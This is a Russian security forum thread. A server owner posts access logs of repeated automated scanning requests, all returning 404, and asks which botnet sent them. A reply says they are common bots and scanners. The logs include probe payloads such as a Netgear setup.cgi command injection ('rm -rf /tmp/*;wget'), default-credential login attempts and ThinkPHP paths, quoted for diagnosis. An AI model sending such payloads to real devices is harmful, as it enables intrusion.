• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Атака на сервер

user417

New member
19.04.2021
1
0
BIT
0
Здравствуйте!
2-3 раза в день на сервер приходят подобные запросы с интервалом в 3 секунды, затем ip адрес меняется и запросы повторяются:

"GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404
"GET /bag2 HTTP/1.1" 404
"GET /TP/public/index.php HTTP/1.1" 404
"POST /users?page=&size=5 HTTP/1.1" 404
"GET /TP/index.php HTTP/1.1" 404
"GET /config/getuser?index=0 HTTP/1.1" 404
"GET /TP/public/index.php HTTP/1.1" 404
"GET /TP/index.php HTTP/1.1" 404
"GET /thinkphp/html/public/index.php HTTP/1.1" 404
"GET /html/public/index.php HTTP/1.1" 404
"GET /public/index.php HTTP/1.1" 404
"GET /TP/html/public/index.php HTTP/1.1" 404
"GET /elrekt.php HTTP/1.1" 404
"GET /index.php HTTP/1.1" 404
"POST /users?page=&size=5 HTTP/1.1" 404
"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+ HTTP/1.0" 404
"GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404
"POST /3535/inc/e93cc142f47fdc.php HTTP/1.1" 404
"GET /config/getuser?index=0 HTTP/1.1" 404
"POST /3535/inc/e93cc142f47fdc.php HTTP/1.1" 404
"GET /script HTTP/1.1" 404
"POST /3535/inc/e93cc142f47fdc.php HTTP/1.1" 404
"GET /config/getuser?index=0 HTTP/1.1" 404
"GET /invoker/readonly HTTP/1.1" 404
"GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404

Кто-нибудь сталкивался с подобным? Что за ботнет?
 

Pernat1y

Well-known member
05.04.2018
1 443
135
BIT
0
Боты/сканеры, коих дофига. Можно попробовать по user agent иногда определить, если он в лог пишется.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!